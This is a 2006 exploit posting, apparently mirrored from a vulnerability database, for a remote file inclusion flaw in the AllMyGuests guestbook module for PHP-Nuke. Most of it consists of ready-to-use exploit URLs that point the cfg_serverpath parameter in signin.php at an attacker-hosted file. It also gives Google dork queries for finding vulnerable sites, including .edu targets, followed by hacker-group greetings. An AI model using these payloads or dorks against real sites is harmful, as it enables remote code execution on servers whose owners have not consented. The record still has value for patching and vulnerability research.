Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14372
HistorySep 21, 2006 - 12:00 a.m.

AllMyGuests => ?_AMGconfig[cfg_serverpath] Remote File Inclusion Exploit

2006-09-2100:00:00
vulners.com
371

#============================================================================#

AllMyGuests => ?_AMGconfig[cfg_serverpath] Remote File Inclusion Exploit

#============================================================================#

Scirpt Infected signin.php

Critical level : Dangerous

#============================================================================#

By Br@Him Ma-Edition

#============================================================================#

Http://www.Af-Team.com

Arabian-FighterZ Crew

#=============================================================================#

Exploit:

###################################################################################################

Http://www.Victime.com/modules.php?name=allmyguests

http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker

Search Google ( Nuke ET Copyright © 2004 por Truzone. )

( allinurl:.edu./modules.php?name=allmyguests )

( "powered by AllMyGuests" )

To Contact: [email protected] or [email protected]

Greet : Silitoad STr0ke. Sn1p8r. Ope3runix . Simo64 .The_Condor.r00ted . Silitix . Zakix .Daftrix.

Oli Nsinah lmera lmajia :P

###################################################################################################
By Morocco

Notes:
Nuke module as well as the standalone is vulnerable.
http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
http://www.vicitime.com/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
/str0ke